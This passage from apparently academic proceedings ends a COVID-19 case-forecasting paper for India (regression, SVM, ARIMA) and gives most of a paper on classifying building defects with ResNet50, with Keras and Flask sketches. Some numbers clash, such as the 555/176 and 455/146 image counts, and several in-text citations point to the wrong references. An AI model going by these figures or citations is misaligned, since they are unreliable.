Algeria 28.03390 1.659600 0 0 0 0 0 0 … 75,867 77,000 78,025 79,110 80,168
Andorra 42.50630 1.521800 0 0 0 0 0 0 … 6304 6351 6428 6534 6610
Angola −11.20270 17.873900 … 14,634 14,742 14,821 14,920 15,008
Antigua and 17.06080 −61.796400 0 0 0 0 0 0 … 139 139 140 141 141
Barbuda
Argentina −38.41610 −63.616700 0 0 0 0 0 0 … 1,374,631 1,381,795 1,390,388 1,399,431 1,407,277
Armenia 40.06910 45.038200 0 0 0 0 0 0 … 126,709 127,522 129,085 130,870 132,346
Australia −37.47350 149.012400 0 0 0 0 0 0 … 115 115 115 116 117
Australia −33.86880 151.209300 0 0 0 0 0 4 … 4548 4552 4552 4556 4564
Table 2 COVID-19 dataset of India
S No. Date Time State/Union Territory Confirmed Indian National Confirmed Foreign National Cured Deaths Confirmed
0 1 30/01/20 6.00 PM Kerala 1 0 0 0 1
1 2 31/01/20 6.00 PM Kerala 1 0 0 0 1
2 3 01/02/20 6.00 PM Kerala 2 0 0 0 2
3 4 02/02/20 6.00 PM Kerala 3 0 0 0 3
4 5 03/02/20 6.00 PM Kerala 3 0 0 0 3
5 6 04/02/20 6.00 PM Kerala 3 0 0 0 3
6 7 05/02/20 6.00 PM Kerala 3 0 0 0 3
7 8 06/02/20 6.00 PM Kerala 3 0 0 0 3
8 9 07/02/20 6.00 PM Kerala 3 0 0 0 3
9 10 08/02/20 6.00 PM Kerala 3 0 0 0 3

of Health and Family Affairs containing seven months of coronavirus data in India
from January 30, 2020 to September 2, 2020. This dataset consists of 5861 rows and
9 distinct attributes.

3.2 Experimental Analysis and Prediction

The following section summarizes the concept of artificial intelligence analytics


including LR, SVM, and ARIMA.
(1) Linear Regression: In linear regression, there are independent variables and dependent variables, where
the dependent variable is continuous in nature. The relationship between the dependent and independent
variables is linear, which is why the method is called linear regression. If X and Y are two variables in the
dataset, they are assumed to be linearly related. As given in Eq. (1), the linear regression line is:

Y = BX + A (1)

In Eq. (1), Y is the dependent variable, A and B are the linear regression coefficients, and X is the
independent variable. The dependent variable refers to the final output, and X represents the confirmed
cases. The goal of linear regression is to minimize the sum of the squared residuals between the observed
and the predicted values. The residual is defined in Eq. (2), and the coefficients are obtained from Eqs. (3)
and (4):

E = Y(i) − BX − A    (2)

A = Ȳ − B X̄    (3)

B = Σ(X − X̄)(Y(i) − Ȳ) / Σ(X − X̄)²    (4)

In Eq. (2), E is the residual, i.e., the difference between the actual and predicted value, Y(i) is the true value
of the data point, while Ȳ and X̄ represent the average values of Y and X.
(2) Support Vector Machine (SVM): A support vector machine (SVM) is a supervised learning model used
for classification, analyzing data in two-group classification problems [12]. For linearly separable data,
SVM places two decision boundaries in the X–Y plane around a separating hyperplane. The margin is the
sum of the distances (D^− + D^+) between the two decision boundaries. For classifying the data points, we
consider the hyperplane or decision boundary which has the maximum margin width; the higher the width
of the margin, the better the accuracy. The margin m and ||w|| are inversely proportional, where w is the
weight vector. Therefore, to maximize the margin, ||w|| has to be minimized:

Minimize ||w||²/2    (5)
There are two commonly used variants of the SVM algorithm: hard SVM and soft SVM. Hard SVM: if the
data is perfectly linearly separable, it is beneficial to use the hard SVM formulation, which can quickly
determine the decision boundary subject to the constraint:
 
y(i)(w^T X(i) − B) ≥ 1 for all 1 ≤ i ≤ n    (6)

In Eq. (6) above, X(i) are the samples or data points and Y(i) is the output response, where w is the normal
vector to the hyperplane. There is a second formulation used to handle outliers; it places a smaller penalty
on misclassified points and is called the soft SVM formulation:

Minimize ||w||²/2 + C Σ_i max(0, 1 − y_i(w^T x_i + b))    (7)

In Eq. (7) above, C is the regularization parameter that balances the margin width and the misclassification
penalty. Thus, the goal of the SVM formulation is to minimize the expression specified in Eq. (7).
(3) Auto Regressive Integrated Moving Average (ARIMA): ARIMA is a group of models that uses time-series
data for better understandability and to predict future trends based on the series' own past values. It is
referred to by the order (p, d, q), where p, d, and q are non-negative integers, and it can be used to forecast
future values. ARIMA is a model that uses the dependent relationship between an observation and some
number of lagged observations [13, 14]. One step involves differencing the observed data points in order to
make the time series stationary so that it can be analyzed well. The model also uses the dependency between
an observation and the residual errors from a moving average model applied to lagged observations. (A
brief illustrative sketch of fitting the linear regression and ARIMA models in Python is given at the end of
this section.)
4 Results

In this research, we have used various AI analytics to predict the trend of coronavirus. The algorithms we
used gave the following accuracies for prediction of the coronavirus: LR (98%), SVM (72.45%), ARIMA
(99.87%), and LSTM (42%). It was observed that the ARIMA model is the best overall because it achieves
the maximum accuracy (99.87%). In this section, we present the prediction of total coronavirus cases using
confirmed, recovered, and death cases as our dominant features. In Fig. 1, we show the total active, cured,
and death cases in hotspot countries (China, India, United Kingdom, France, US, and Italy). We then focused
our research on coronavirus trend prediction for India and examined the timeline of the confirmed, recovered,
and death rates due to coronavirus in India (Fig. 2). Our results show the predicted total cases for India from
January 29, 2021 to February 2, 2021, with an average accuracy of 99.87%. The predicted cases were
obtained from the confirmed cases between January 24, 2021 and January 28, 2021. In Fig. 3, we show the
regression line we observed and the predicted total cases date-wise for the next 15 days till 19th Feb. In
Fig. 4, we show the predicted cases for the next 120 days: first the actual data of total cases from Jan 2020
to Jan 2021, and then the predicted data for the following 120 days till May 2021.

Fig. 1 Active, recovered, deaths in hotspot countries till January 2021

Fig. 2 Total confirmed, active, death rate in India from March 2020 to Jan 2021

Fig. 3 Cumulative trend prediction of confirmed cases for next 15 days till Feb 2021

Fig. 4 Cumulative trend prediction of confirmed cases for next 120 days till May 2021

5 Conclusion

Our research has presented various artificial intelligence techniques to predict the trend of coronavirus in
India. The models used include LR, SVM, LSTM recurrent networks, and ARIMA. The forecast was done
based on confirmed, cured, and deceased cases. The results are also presented graphically for better
understandability of the predicted results. The AI analytics we used gave the following accuracies for
prediction of the coronavirus: LR (98%), SVM (72.45%), ARIMA (99.87%), and LSTM (42%). The linear
regression and ARIMA models give the best results with maximum accuracy (98% and 99.87%,
respectively) and performed better than existing counterparts. As a future research direction, we will be
developing specialized DL models, including MLP and autoencoders, for trend prediction with better
accuracy.

References

1. Magazzino, C., Mele, M., & Schneider, N. (2021). A machine learning approach on the relationship
among solar and wind energy production, coal consumption, GDP, and CO2 emissions.
Renewable Energy, 167, 99–115.
2. Kavadi, D. P., Patan, R., Ramachandran, M., & Gandomi, A. H. (2020). Partial derivative
nonlinear global pandemic machine learning prediction of Covid 19. Chaos, Solitons &
Fractals, 139, 110056.
3. Sharma, S. (2020). Drawing insights from COVID-19-infected patients using CT scan images
and machine learning techniques: A study on 200 patients. Environmental Science and Pollution
Research, 27(29), 37155–37163.
4. Tuli, S., Tuli, S., Tuli, R., & Gill, S. S. (2020). Predicting the growth and trend of COVID-19
pandemic using machine learning and cloud computing. Internet of Things, 11, 100222.
5. Chaurasia, V., & Pal, S. (2020). Covid-19 pandemic: Application of machine learning time
series analysis for prediction of human future. Available at SSRN 3652378.
6. Lalmuanawma, S., Hussain, J., & Chhakchhuak, L. (2020). Applications of machine learning
and artificial intelligence for Covid-19 (SARS-CoV-2) pandemic: A review. Chaos, Solitons
and Fractals, 110059.
7. Rustam, F., Reshi, A. A., Mehmood, A., Ullah, S., On, B.-W., Aslam, W., & Choi, G. S.
(2020). COVID-19 future forecasting using supervised machine learning models. IEEE Access,
8, 101489–101499.
8. Nayak, J., Naik, B., Dinesh, P., Vakula, K., Kameswara Rao, B., Ding, W., & Pelusi, D. (2021).
Intelligent system for COVID-19 prognosis: A state-of-the-art survey. Applied Intelligence,
1–31.
9. Gujral, H., & Sinha, A. (2021). Association between exposure to airborne pollutants and
COVID-19 in Los Angeles, United States with ensemble-based dynamic emission model.
Environmental research, 194, 110704.
10. COVID-19 Data Repository by the Center for Systems Science and Engineering (CSSE) at
Johns Hopkins University.
11. COVID-19 India dataset, data extracted from Ministry of health and family affairs.
12. Sinha, A., & Rathi, M. (2021). COVID-19 prediction using AI analytics for South Korea.
Applied Intelligence, 1–19.
13. Sharma, R. R., Kumar, M., Maheshwari, S., & Ray, K. P. (2020). EVDHM-ARIMA-based
time series forecasting model and its application for COVID-19 cases. IEEE Transactions on
Instrumentation and Measurement, 70, 1–10.
14. Singh, S., Chowdhury, C., Panja, A. K., & Neogy, S. (2021). Time series analysis of COVID-19
data to study the effect of lockdown and unlock in India. Journal of The Institution of Engineers
(India): Series B, 1–7.
Detection of Building Defects Using
Convolutional Neural Networks

Dokuparthi Sai Santhoshi Bhavani, Abhijit Adhikari, and D. Sumathi

Abstract Deep learning has intervened in almost all domains. Across various fields, researchers have
introduced deep learning techniques in several phases such as detecting damage, predicting the robustness
of repair mortars, and various other activities. A crucial and significant task of building maintenance is to
detect damage in wall surfaces at an early stage. The issue becomes complex when the number of buildings
is huge. Hence, many maintenance engineers and researchers look forward to a better solution. The objective
of this work is to locate the types of several defects that are encountered during the construction phase. This
work focuses on four major defects: spalls, flakes, cracks, and molds. The proposed model uses ResNet50
on a dataset that consists of 555 images for training and 176 images for testing. Detection of the type of
defect is also handled by this model. An accuracy of 81% with a loss of 0.02 has been obtained through the
model deployment. This approach is found to be robust and provides accurate results.

Keywords Convolutional neural networks (CNN) · Computer vision tasks ·


Rectified linear unit (ReLU) · Residual neural network (ResNet) · AlexNet ·
VGG16 · ImageDataGenerator · Keras · Feature extraction · Preprocessing

D. S. S. Bhavani (B) · A. Adhikari · D. Sumathi


VIT-AP University, Amaravati, India
e-mail: bhavani.bokuparthi@vitap.ac.in
A. Adhikari
e-mail: abhijit.adhikari@vitap.ac.in
D. Sumathi
e-mail: sumathi.d@vitap.ac.in


1 Introduction

The field of civil engineering has an extensive range of issues associated with plan-
ning wastewater treatment plant functioning [1], modeling the stress–strain associa-
tions [2], and other designs of architecture [2] that could be solved by the application
of deep learning algorithms. Among the various activities, building construction has increased due to population growth, resulting in high-rise buildings, especially apartments. The construction business is growing tremendously on par with technology, irrespective of the huge cost of building materials. Many builders construct buildings by mixing concrete powder instead of using sand, which lowers the budget and yields better profits. Due to this, the condition of the building might deteriorate in the future, and there are chances of defects like cracks and spalls. This is the predominant issue that arises frequently and needs to be resolved. Since most constructed buildings are high-rise, identifying building defects manually is very difficult and time consuming. To overcome this problem, deep learning and machine learning image analysis algorithms have been used to identify the type of building defect by analyzing the
image. A genetic algorithm and percolation model have been proposed by Qu et al.
[3, 4]. In this, the authors have worked on a model for the detection of cracks on concrete pavement under several kinds of noise. In [5], the Zernike moment operator
works behind the crack width detection approach. Here, dual-scale CNN has been
deployed for the detection of the crack’s width. A crack detection approach based on
the deep convolutional neural architecture has been suggested in [6] which combines
the multiscale and several levels of information about the target object.
In 2020, Qu et al. [7] performed crack detection through the deployment of a convolutional neural network. As the first step, the cracks were classified with the help of various deep learning models. Considering the low percentage of effective concrete pavement crack images among the mass of images collected by the crack detection vehicle, the output dimension is modified before crack detection. The efficiency was augmented by scaling the network model horizontally, and the convolution layers use kernel sizes of 1 × 1 and 3 × 3. The approach is compared with the VGG16 network [8], from which it has been observed that it is not capable enough, as only cracks were used for detection. In the present work, the authors propose an update over the VGG16 network. This model employs ResNet50, which has several network layers. These layers are used to extract features from images using a CNN.
ResNet [9] makes it possible to train neural networks of up to about 152 layers. There are several ResNet variants, e.g., ResNet18, ResNet50, and ResNet152. We implemented ResNet50 in our model, and the detection is done with it. The main advantage of using this model is that ResNet50 uses the concept of the skip connection, as illustrated in Fig. 1 [10]; the connection skips a few layers and is added back just before the ReLU activation function to acquire better accuracy. Two different blocks are generally used in ResNet50: if the input size is equal to the output size, the identity block is used; otherwise, the convolution block is used. In the convolution block, an extra convolution layer is added on the skip connection.

Fig. 1 Skip connection in ResNet in identity block and convolution block
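To make the two block types concrete, the following is a minimal Keras sketch of the shortcut logic described above; the filter counts and function names (identity_block, conv_block) are illustrative assumptions, and batch normalization is omitted for brevity, so it should be read as a sketch rather than the exact code used in this work.

# Minimal sketch of ResNet-style shortcut blocks (illustrative, not the exact implementation used here).
from tensorflow.keras import layers

def identity_block(x, filters):
    # Shortcut is the unchanged input; used when input and output sizes match.
    f1, f2, f3 = filters
    shortcut = x
    x = layers.Conv2D(f1, (1, 1), activation='relu')(x)
    x = layers.Conv2D(f2, (3, 3), padding='same', activation='relu')(x)
    x = layers.Conv2D(f3, (1, 1))(x)
    x = layers.Add()([x, shortcut])            # skip connection added before the final ReLU
    return layers.Activation('relu')(x)

def conv_block(x, filters, strides=2):
    # Shortcut passes through an extra 1 x 1 convolution; used when the sizes differ.
    f1, f2, f3 = filters
    shortcut = layers.Conv2D(f3, (1, 1), strides=strides)(x)
    x = layers.Conv2D(f1, (1, 1), strides=strides, activation='relu')(x)
    x = layers.Conv2D(f2, (3, 3), padding='same', activation='relu')(x)
    x = layers.Conv2D(f3, (1, 1))(x)
    x = layers.Add()([x, shortcut])
    return layers.Activation('relu')(x)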
Figure 2 represents the architecture of ResNet50 [11], where it consists of four
stages of identity blocks. The input layer has a 7 × 7 filter size of such 64 filters with
a max pooling layer of 3 × 3 filter size of stride 2. In each stage of the identity block,
three layers are used. In stage 1, in the first layer, 64 filters with the filter size of 1 ×
1 have been deployed, in the second layer, we use 64 filters with the filter size of 3 ×
3, and in the third layer, 256 filters with the filter size of 1 × 1 are used. Stage 1 will
be done three times. So, here a total of nine layers has been obtained (3 layers × 3
times = 9). In stage 2, in the first layer, 128 filters with the filter size of 1 × 1, in the
second layer 128 filters with the filter size of 3 × 3, in the third layer 512 filters with
the filter size of 1 × 1 have been deployed. Stage 2 will be done four times. Here, a
total of 12 layers (3 layers × 4 times = 12) has been achieved. In stage 3, in the first
layer, 256 filters with the filter size of 1 × 1, in the second layer 256 filters with the
filter size of 3 × 3, in the third layer 1024 filters with the filter size of 1 × 1 have
been used. Stage 3 will be done six times. Therefore, a total of 18 layers (3 layers
× 6 times = 18) is the output. In stage 4, in the first layer, 512 filters with the filter
size of 1 × 1, in the second layer 512 filters with the filter size of 3 × 3, and in the
third layer, 2048 filters with the filter size of 1 × 1 have been implemented. Stage 4
will be done three times. Subsequently, we get a total of nine layers (3 layers × 3
times = 9). The output layer is fully connected. It uses max pooling and softmax as

Fig. 2 Architecture of ResNet50

an activation function. So, the total layers used in architecture of ResNet50 are 1 +
9 + 12 + 18 + 9 + 1 = 50 layers.
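This stage layout matches the stock ResNet50 that ships with Keras; the short sketch below loads it as a frozen feature extractor with a small classification head on top. The four-class head, pooling choice, and the use of ImageNet weights are assumptions for illustration rather than the exact configuration used by the authors.

# Sketch: pretrained ResNet50 as a feature extractor with an assumed 4-class defect head.
from tensorflow.keras.applications import ResNet50
from tensorflow.keras import layers, models

base = ResNet50(weights='imagenet', include_top=False, input_shape=(224, 224, 3))
base.trainable = False                      # freeze the pretrained convolutional stages

model = models.Sequential([
    base,
    layers.GlobalAveragePooling2D(),
    layers.Dense(4, activation='softmax'),  # assumed classes: cracks, flakes, spalls, molds
])
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])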
The architecture of AlexNet:
AlexNet [12, 13] is one of the algorithms used to solve the problem of image clas-
sification. It consists of 60 million parameters. If the input size of an RGB image is 256 × 256, then all the images of the training and testing sets would be of size 256 × 256. The architecture of AlexNet is shown in Fig. 3.
Fig. 3 Architecture of AlexNet

From the architecture shown in Fig. 3, we can observe that AlexNet consists of 1 softmax layer, 2 fully connected layers, 3 overlapping max pooling layers, 2

normalization layers, and 5 convolutional layers. Convolution layers operating on the same image size can have different numbers of kernels. Going through the architecture: initially, a convolution layer with stride = 4 and 96 kernels of size 11 × 11 is used, followed by an overlapping max pooling layer of size 3 × 3 with stride = 2. Then, a convolution layer with 256 kernels of size 5 × 5 and padding = 2 is applied, again followed by an overlapping max pooling layer of size 3 × 3 with stride = 2. Next, three convolution layers of 384 kernels of size 3 × 3 with padding of 2 are connected directly to each other, followed by an overlapping max pooling layer of size 3 × 3 with stride = 2. Finally, two fully connected layers of 4096 units are followed by a 1000-way softmax output layer, which gives the distribution over the 1000 class labels. Each convolution layer contains convolution filters along with a nonlinear activation function, i.e., ReLU [14]. ReLU is applied after every convolution layer and fully connected layer. Before the two fully connected layers, dropout is applied. Dropout is a method introduced by G. E. Hinton in which a neuron is dropped from the network so that it does not contribute to either forward or backward propagation. Dropout increases the number of training iterations, but without it our model would overfit significantly.
The input size of an image would be 227 × 227 × 3 due to padding. The accuracy
obtained through this AlexNet model is comparatively poor. Hence, another model is deployed to improve the detection rate. The objective of the research
is to devise a model based on deep learning techniques to automate the maintenance
process. The major objective of this research therefore is set to investigate the novel
application of the deep learning method of convolutional neural networks (CNN)
in automating the condition assessment of buildings. The focus is to automate the
detection and localization of key defects arising from dampness in buildings from
images. This paper begins with a brief overview of related works that focus on various techniques. The next section covers the scope of the work, followed by the proposed methodology. Experimental analysis and results are discussed in the subsequent section. The last section provides the conclusion and future enhancements.
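For readers who prefer code, the following is a rough Keras sketch of the AlexNet-style stack described earlier in this section. It follows the layer counts given in the text (the canonical AlexNet differs in minor details, such as the filter count of the last 3 × 3 convolution), so it is an illustration rather than the exact network evaluated here.

# Rough AlexNet-style stack following the description in Sect. 1 (illustrative only).
from tensorflow.keras import layers, models

alexnet = models.Sequential([
    layers.Conv2D(96, (11, 11), strides=4, activation='relu', input_shape=(227, 227, 3)),
    layers.MaxPooling2D((3, 3), strides=2),
    layers.Conv2D(256, (5, 5), padding='same', activation='relu'),
    layers.MaxPooling2D((3, 3), strides=2),
    layers.Conv2D(384, (3, 3), padding='same', activation='relu'),
    layers.Conv2D(384, (3, 3), padding='same', activation='relu'),
    layers.Conv2D(384, (3, 3), padding='same', activation='relu'),
    layers.MaxPooling2D((3, 3), strides=2),
    layers.Flatten(),
    layers.Dense(4096, activation='relu'),
    layers.Dropout(0.5),
    layers.Dense(4096, activation='relu'),
    layers.Dropout(0.5),
    layers.Dense(1000, activation='softmax'),   # 1000-way softmax output as described
])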

2 Literature Survey

CNN techniques are widely used for image processing and the objective of this
algorithm is to predict the various building defects.
Qu et al. [7] proposed a model for crack detection using CNN. They used VGG16 to optimize the model and extract the characteristic features of cracks, and developed the crack detection model on the LeNet-5 network. The authors mention that, by training this model, cracks in concrete pavements can be accurately identified among various types of disturbances. The paper concluded that, to upgrade the effectiveness of crack detection, the YOLO v3 series would be used to improve the detection rate. However, LeNet-5 is not capable enough, as only cracks were used for detection. Instead, we propose a model based on ResNet, which was introduced in the year 2015, where multiple network layers are used to extract features from images using CNN; it is an updated model compared with the LeNet-5 network.
Perez et al. [15] also implemented CNN techniques to detect building defects like mold, deterioration, and stain, using the VGG16 network for classification. In this paper, it is mentioned that Perez et al. performed localization of objects by using class activation mapping (CAM) and covered only three building defects, i.e., mold, stain, and deterioration, with the VGG16 network. The work is also compared with other models like ResNet50 and Inception, but the best accuracy is obtained with VGG16, with 97.83% training accuracy and about 98.86% validation/testing accuracy. Apart from this, the work would be more capable if other building defects like cracks, spalls, flakes, etc., were included, which would make the model more efficient.
Kong et al. [16] proposed a model for monitoring the health of buildings by using the sensors present inside smartphones and discussed how the computer vision algorithm is implemented. The study surveyed many commercial and residential buildings. During small earthquakes, the results illustrate the capacity to extract the different frequencies from the upper levels of buildings. The main aim of that research is to monitor building defects using a smartphone, which is a good idea but not so useful in all cases. Instead, the model could be extended with another feature, i.e., drones; drones can record footage, which makes it easier and more convenient to monitor the health of buildings, especially high-rise buildings, in real-life applications.
Zhu et al. [17] presented a vision-based method of defect detection for bridges using CNN and transfer learning. The results were compared with other studies based on machine learning algorithms and illustrate that their approach gives better accuracy and efficiency of performance. However, Zhu et al. applied CNN and transfer learning only to detect the defects of bridges; the same model could also be used for the detection of building defects so that the condition of buildings could be monitored.
Zhong et al. [18] also proposed a CNN-based model using deep learning techniques to classify quality problems in the building industry in China for the health and safety of people. The authors discussed the quality problems by comparing classifiers, i.e., support vector machine and Bayes-based classifiers. The results showed that the model performed well with the implementation of the CNN-based approach. Apart from checking quality problems in the building industry, the same model could also be used to inspect bridges.

3 Scope of Work

The work has mainly focused on detecting building defects, and surveys have been conducted related to it. Based on the literature survey, many models already exist to detect the defects of a building, but the existing approaches are not capable enough of detecting the defects. To detect the building defects, we have deployed models based on AlexNet and ResNet50, which detect defects more accurately than the existing approaches. The combination of the deep learning technique (CNN architecture) and the ResNet50 model has been implemented here to augment the accuracy. Information about the architecture of AlexNet was provided in the previous section.

4 Proposed Algorithm

The proposed system, shown in Fig. 4, aims to detect the defects in a building, which will reduce manual checking by humans. Whenever there is a defect, i.e., a spall or crack in the building, the user needs to capture the defect and send the images from wherever they are. It has been inferred from various works that the deployment of CNN could solve various issues in computer vision. The main advantage of deploying CNN in this work is that the detection of cracks becomes easier without human intervention. Among the architectures, we have applied ResNet50 to determine the defect types. The proposed model is shown in Fig. 4.

Fig. 4 Block diagram of the proposed model



Algorithm
Step 1—START.
Step 2—Select an image as input to the model.
Step 3—Image processing will be done by using different layers.
Step 3a—Initially import the package Sequential so that all the packages will be
sequentially imported.
Step 3b—Then, image processing will be done using the package Convolution2D
to extract the features of the image. Then, the activation function—ReLU is used to
activate the neurons.
Step 3c—In the next step, the image pooling will be done using the package
MaxPooling2D. Here, the feature map is generated when the image is pooled.
Step 3d—The generated feature map will be converted into a one-dimensional array using the package Flatten.
Step 4—Dense layers will be added to the model, consisting of an input layer, a hidden layer, and an output layer in sequence.
Step 5—Training and testing of the model by generating our data using the package
ImageDataGenerator.
Step 6—Compiling the model using an optimizer.
Step 7—Importing the package ResNet50.
Step 8—Again training and testing the model.
Step 9—Connecting our model to Flask to access the Web application.
Step 10—END.
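A minimal Keras sketch of Steps 2–6 and 8 is given below; the directory paths, image size, filter counts, and the four-class output are assumptions for illustration, and the ResNet50 variant of Step 7 follows the transfer-learning sketch shown earlier in the paper.

# Sketch of the training pipeline in the steps above (illustrative; paths and sizes are placeholders).
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense
from tensorflow.keras.preprocessing.image import ImageDataGenerator

model = Sequential([
    Conv2D(32, (3, 3), activation='relu', input_shape=(224, 224, 3)),  # Step 3b: feature extraction + ReLU
    MaxPooling2D((2, 2)),                                              # Step 3c: pooled feature map
    Flatten(),                                                         # Step 3d: one-dimensional feature vector
    Dense(128, activation='relu'),                                     # Step 4: hidden layer
    Dense(4, activation='softmax'),                                    # Step 4: output layer (4 assumed defect classes)
])
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])  # Step 6

# Step 5: generate training and test batches from image folders (placeholder paths).
datagen = ImageDataGenerator(rescale=1.0 / 255)
train_gen = datagen.flow_from_directory('data/train', target_size=(224, 224), batch_size=32)
test_gen = datagen.flow_from_directory('data/test', target_size=(224, 224),
                                       batch_size=32, shuffle=False)

model.fit(train_gen, validation_data=test_gen, epochs=25)              # Step 8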

4.1 Method

The significant features of CNN are properties like dimensionality reduction and a reduced number of parameters. Computation is decreased due to parameter sharing. Additionally, the learning acquired in one part of the image is utilized in other parts of the image. Dimensionality reduction plays a vital role in reducing the required computation power. These are the reasons that contributed to the deployment of CNN for detecting the defects in the building.

4.2 Importing Building Libraries, Layers, and Their Working

In this work, initially, the model processes the image by using the various functions
in Keras like Sequential, Dense, Convolution2D, MaxPooling2D, and Flatten. The
detailed role of each function is given below.
Sequential—This function stacks the network layers sequentially from the input image to the predicted output.

Convolution2D—It extracts different features of an image using small squares of the input data. It takes the input image and a kernel or filter as input [19].
MaxPooling2D—It takes the maximum value from the feature map to get the
most important features of the output feature map.
Figure 5 represents the working of the max pooling layer. Using this layer, the maximum value is selected from each square to give the pooled feature map as output; the dimensions of the output feature map to be produced are used when configuring the max pooling layer.
Flatten—It helps the data to convert into a one-dimensional array to give input to
the next layer.
Figure 6 shows the working of the Flatten layer. Here, the output of the pooled
feature map will be converted into a one-dimensional array by using the layer, Flatten.
Dense—It is a fully connected neural network layer, where each layer is connected to the next and each input node is connected to every output node.
The accuracy of the model is 81%. ResNet50 has been deployed in our model to get good results. Finally, the proposed model has been loaded into a Flask implementation, which is used to develop our Web application.
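As an illustration of this last step, a minimal Flask sketch for serving predictions from the saved model is shown below; the file names, route, and label order are assumptions and not the authors' actual Web application.

# Minimal Flask sketch for serving the saved defect classifier (illustrative only).
import numpy as np
from flask import Flask, request, jsonify
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing import image

app = Flask(__name__)
model = load_model('building_defect_model.h5')          # assumed name of the saved model file
LABELS = ['cracks', 'flakes', 'molds', 'spalls']        # assumed label order

@app.route('/predict', methods=['POST'])
def predict():
    f = request.files['image']                          # uploaded photo of the suspected defect
    f.save('upload.jpg')
    img = image.load_img('upload.jpg', target_size=(224, 224))
    arr = np.expand_dims(image.img_to_array(img) / 255.0, axis=0)
    probs = model.predict(arr)[0]
    return jsonify({'defect': LABELS[int(np.argmax(probs))]})

if __name__ == '__main__':
    app.run()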

Fig. 5 Working of max pooling layer

Fig. 6 Working of flatten layer

5 Experimental Analysis

A. Implementation

In this work, Python has been used in Jupyter Notebook and the Spyder application. HTML is used in the Spyder application to create a Web page using
Flask. In this model, evaluation is done on a separate set of 455 images in the training
dataset and 146 images in the test dataset. Initially, the AlexNet model is deployed
and evaluation is done. The confusion matrix obtained is shown in Fig. 7. From
Fig. 8, the classification report is used to determine the metrics such as precision,
recall, and F1-score.
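The confusion matrix and classification report of this kind can be produced with scikit-learn, as in the short sketch below; it assumes the model and a non-shuffled test generator from the earlier pipeline sketch, so the variable names are placeholders rather than the authors' code.

# Sketch: computing the confusion matrix and classification report (assumes model and test_gen
# from the earlier pipeline sketch, with the test generator created with shuffle=False).
import numpy as np
from sklearn.metrics import confusion_matrix, classification_report

probs = model.predict(test_gen)
y_true = test_gen.classes                       # ground-truth class indices, in generator order
y_pred = np.argmax(probs, axis=1)
print(confusion_matrix(y_true, y_pred))
print(classification_report(y_true, y_pred, target_names=list(test_gen.class_indices)))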
Train loss vs validation loss and train accuracy versus validation accuracy are
shown in Fig. 9. From Fig. 9, it has been observed that the validation accuracy is less
than the training accuracy. There might be a few reasons for this, such as the small validation set and the unbalanced dataset. To improve the accuracy and reduce the loss, ResNet50 has been deployed. The evaluation test showed a consistent overall accuracy of 81%
(Fig. 10), and 90% of images were correctly classified.
In this model, initially, we have applied deep learning techniques and trained
our model. Then, we loaded this model in ResNet50 implementation and trained the
model again. Figure 10 shows accuracy when the ResNet50 model was implemented.
The model has also been evaluated based on the various performance metrics, such as
precision, recall, and F1-score. Figure 11 shows the metrics for the deployed model.
We saved our model and again we loaded it in the Flask implementation which is
used to develop a Web application.

Fig. 7 Confusion matrix



Fig. 8 Classification report

Fig. 9 Accuracy and loss of AlexNet architecture

Fig. 10 Accuracy after ResNet50 model is implemented

Fig. 11 Metrics

5.1 Results

As we proposed, our results indicated reasonable accuracy of our system in iden-


tifying the flakes, spalls, and cracks on walls of a building (Figs. 12, 13, 14 and
15).

5.2 Discussion

This work addresses a predominant issue faced by the clients. As the detection of
the defects in the building is a complicated task, detection has been done with the

Fig. 12 Prediction of a building defect flakes

Fig. 13 Prediction of a building defect spalls

deployment of the deep learning algorithms. These defects occur mainly in high-
rise buildings, and the main defects were cracks, spalls, and flakes. These defects
were caused due to (1) the moisture problems of the environment such as wind,
temperature, and rain, (2) improper quality in the standards of building construction,
(3) walls showing discoloration like brown or a yellow tainted stain, (4) improper
ventilation may also lead to the building defects at walls, ceiling, floors, and roof,
and (5) damages in the foundation. Some examples of building defects are leaks

Fig. 14 Prediction of a building defect cracks

Fig. 15 Information about the mentioned building defects

in common areas like windows/doors/roofs, moisture problems due to improper


waterproofing, and discoloration on walls.

6 Conclusion and Future Scope

This work mainly focused on the detection of types of defects in the building. Auto-
mated detection of cracks has been done through the deployment of ResNet50. This
classification problem takes images of size 224 × 224 × 3 as our dataset. In this
work, 555 images have been considered for training and 176 images for the test
dataset. The model has run on 25 epochs, and the accuracy recorded is 81% with
0.02 loss on the training set and 83% validation accuracy with 0.01 loss. The overall
performance of this work showed reliability and flexibility in the classification of
the type of defects. This work is mainly focused on the four defects, namely cracks,
flakes, spalls, and molds. This work has various limitations in the dataset since it
possesses only images with visible defects. Additionally, the type of images taken
for consideration could have various backgrounds, and the edges shall be made clear.
The model could be enhanced in such a way that it is compatible with such images while still providing good results.

References

1. Sànchez–Marrè, M., Cortés, U., Roda, R. I., Poch, M., & Lafuente, J. (2002, December
17). Learning and adaptation in wastewater treatment plants through case–based reasoning.
Retrieved January 31, 2021 from https://doi.org/10.1111/0885-9507.00061
2. Borner, K. (Ed) .(1995). Modules for design support. Technical Report FABEL-Report No. 35.
GMD, Sankt Augustin, Germany
3. Penumadu, D., Agrawal, G., & Chameau, J. (1992, May 01). In J. Ghaboussi, J. H. Garrett Jr.
& X. Wu (Eds.), Discussion of knowledge-based modeling of material behavior with neural
networks (January, 1991, Vol. 117, No.1). Retrieved January 31 2021 from https://ascelibrary.
org/doi/abs/10.1061/%28ASCE%2907339399%281992%29118%3A5%281057.2%29
4. Qu, Z., Chen, Y.-X., Liu, L., Xie, Y., & Zhou, Q. (2019). The algorithm of concrete surface
crack detection based on the genetic programming and percolation model. IEEE Access, 7,
57592–57603.
5. Qu, Z., Chen, S.-Q., Liu, Y.-Q., & Liu, L. (2019). Eliminating lining seams in tunnel concrete
crack images via line segments’ translation and expansion. IEEE Access, 7, 30615–30627.
6. Ni, F. T., Zhang, J., & Chen, Z. Q. (2019, may) Zernike-moment measurement of thin-crack
width in images enabled by dual-scale deep learning. Computer-Aided Civil Information,
34(50), 367–384.
7. Liu, Y., Yao, J., Lu, X., Xie, R., & Li, L. (2019). DeepCrack: a deep hierarchical feature learning
architecture for crack segmentation. Neurocomputing, 338, 139–153.
8. Qu, Z., Mei, J., Liu, L., & Zhou, D. Y. (2020). Crack detection of concrete pavement with cross-
entropy loss function and improved VGG16 network model. IEEE Access, 8, 54564–54573.
